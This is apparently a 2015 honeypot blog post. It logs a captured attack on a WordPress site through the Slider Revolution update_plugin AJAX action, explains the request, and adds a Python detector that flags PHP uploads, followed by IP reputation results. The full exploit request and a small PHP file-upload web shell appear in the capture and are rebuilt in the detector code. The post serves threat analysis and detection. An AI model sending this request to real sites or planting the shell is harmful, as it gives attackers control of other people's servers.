Saturday, 8 August 2015

WordPress NULLpOint7r__zemua.php - 192.203.127.198

BEGIN OF HTTP DATA:
2015-08-07 18:24:03
Source IP: 192.203.127.198
Country: US RiskScore: 1 Malware: []
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: johest.de
Content-Length: 654
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=d7711a4c77de4aff8673ca44662115c1

--d7711a4c77de4aff8673ca44662115c1
Content-Disposition: form-data; name="action"

revslider_ajax_action
--d7711a4c77de4aff8673ca44662115c1
Content-Disposition: form-data; name="client_action"

update_plugin
--d7711a4c77de4aff8673ca44662115c1
Content-Disposition: form-data; name="update_file"; filename="NULLpOint7r__zemua.php"
Content-Type: text/html

<?php @set_time_limit(0);@header('null77: pOinter');?><form method='POST' enctype='multipart/form-data'><input type='file' name='f'/><input type='submit' value='up'/></form><?php echo @copy($_FILES['f']['tmp_name'],$_FILES['f']['name'])?'ok':'no';?>
--d7711a4c77de4aff8673ca44662115c1--
Received yesterday on my honeypot.
The attack seems to be optimized for WordPress and targets /wp-admin/admin-ajax.php directly. As you can see in the code, it tries to upload a PHP file.
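
What the request is doing, read from the capture itself: a POST to admin-ajax.php selects the Slider Revolution handler (action=revslider_ajax_action), asks for its update_plugin operation, and hands it a file part named update_file whose name ends in .php. The uploaded file is a minimal dropper: it renders a file form and copies whatever is submitted as f next to itself under its original name, and it emits a custom response header (null77: pOinter), which presumably lets the attacker confirm the shell is live. Note that the part's declared Content-Type (text/html) is chosen by the attacker, so any detection has to look at the filename and the content, not the declared type.

The check a honeypot or WAF rule would make on this traffic, as an added example that is not part of the original post or the honeypot's own code: it parses the raw request, extracts the multipart fields, and flags an update_plugin call whose update_file looks like PHP. The malicious sample is rebuilt from the capture above; the benign control request, the function names and the indicator labels are this example's own assumptions.

```python
"""Detect the RevSlider update_plugin upload pattern in a raw HTTP request.

Added example for this post; it is not the honeypot's code. It flags a POST to
/wp-admin/admin-ajax.php that carries action=revslider_ajax_action,
client_action=update_plugin and an "update_file" part that looks like PHP.
Function names, indicator labels and the benign control request are assumptions
made for this example; the malicious sample is rebuilt from the capture.
"""
import re

PHP_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)


def parse_raw_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, target, _version = lines[0].decode("latin-1").split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target.split("?", 1)[0], headers, body


def multipart_fields(boundary: str, body: bytes):
    """Yield (name, filename, payload) for each part of a multipart body.

    Deliberately reads only Content-Disposition and ignores the per-part
    Content-Type, which the attacker controls (text/html on a PHP file here).
    """
    delim = b"--" + boundary.encode()
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter "--boundary--"
            break
        chunk = chunk[2:] if chunk.startswith(b"\r\n") else chunk
        head, _, payload = chunk.partition(b"\r\n\r\n")
        params = {}
        for line in head.split(b"\r\n"):
            if line.lower().startswith(b"content-disposition:"):
                for m in re.finditer(rb'(\w+)="([^"]*)"', line):
                    params[m.group(1).decode()] = m.group(2).decode()
        if payload.endswith(b"\r\n"):        # CRLF that precedes the next delimiter
            payload = payload[:-2]
        yield params.get("name"), params.get("filename"), payload


def classify_request(raw: bytes):
    """Return a finding dict for a RevSlider webshell upload, else None."""
    method, path, headers, body = parse_raw_request(raw)
    if method != "POST" or not path.endswith("/wp-admin/admin-ajax.php"):
        return None
    ctype = headers.get("content-type", "")
    m = re.search(r'boundary=("?)([^";]+)\1', ctype)
    if not ctype.startswith("multipart/form-data") or not m:
        return None
    fields, uploads = {}, []
    for name, filename, payload in multipart_fields(m.group(2), body):
        if filename is None:
            fields[name] = payload.decode("utf-8", "replace")
        else:
            uploads.append((name, filename, payload))
    if (fields.get("action"), fields.get("client_action")) != ("revslider_ajax_action", "update_plugin"):
        return None
    for name, filename, payload in uploads:
        if name != "update_file":
            continue
        indicators = []
        if PHP_EXT.search(filename):
            indicators.append("php_extension")
        if b"<?php" in payload or b"<?=" in payload:
            indicators.append("php_open_tag")
        if indicators:
            return {"host": headers.get("host"), "path": path,
                    "filename": filename, "indicators": indicators}
    return None   # update_plugin with an archive: would need zip inspection, not flagged here


# --- constructed samples ---------------------------------------------------
BOUNDARY = "d7711a4c77de4aff8673ca44662115c1"


def build_request(parts):
    """Assemble a multipart POST to admin-ajax.php; parts = (name, filename, payload)."""
    body = b""
    for name, filename, payload in parts:
        disp = f'Content-Disposition: form-data; name="{name}"'
        if filename:
            disp += f'; filename="{filename}"\r\nContent-Type: text/html'
        body += f"--{BOUNDARY}\r\n{disp}\r\n\r\n".encode() + payload + b"\r\n"
    body += f"--{BOUNDARY}--\r\n".encode()
    return (f"POST /wp-admin/admin-ajax.php HTTP/1.1\r\nHost: johest.de\r\n"
            f"Content-Length: {len(body)}\r\n"
            f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n\r\n").encode() + body


# The dropper exactly as captured above.
WEBSHELL = (b"<?php @set_time_limit(0);@header('null77: pOinter');?>"
            b"<form method='POST' enctype='multipart/form-data'><input type='file' name='f'/>"
            b"<input type='submit' value='up'/></form>"
            b"<?php echo @copy($_FILES['f']['tmp_name'],$_FILES['f']['name'])?'ok':'no';?>")

CAPTURED = build_request([("action", None, b"revslider_ajax_action"),
                          ("client_action", None, b"update_plugin"),
                          ("update_file", "NULLpOint7r__zemua.php", WEBSHELL)])

# Control case (constructed, not from the capture): same action pair, but an archive.
BENIGN = build_request([("action", None, b"revslider_ajax_action"),
                        ("client_action", None, b"update_plugin"),
                        ("update_file", "revslider.zip", b"PK\x03\x04 not a real archive")])

if __name__ == "__main__":
    print(classify_request(CAPTURED))   # finding with php_extension and php_open_tag
    print(classify_request(BENIGN))     # None
```

The two indicators are kept separate on purpose: a renamed upload (say .phtml or a .zip that is really PHP) still trips the content check, while an innocuous .php filename with no PHP open tag would need manual review rather than an automatic block.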

IBM X-Force has no record of this IP.

IPVoid, on the other hand, reports:
Analysis Date: 2 seconds ago
Blacklist Status: BLACKLISTED 2/40
IP Address: 192.203.127.198
Reverse DNS: Unknown
ASN: AS7018
ASN Owner: AT&T Services, Inc.
ISP: Tuskegee University
Continent: North America
Country Code: (US) United States
Latitude / Longitude: 32.4172 / -85.7191
City: Tuskegee Institute
Region: Alabama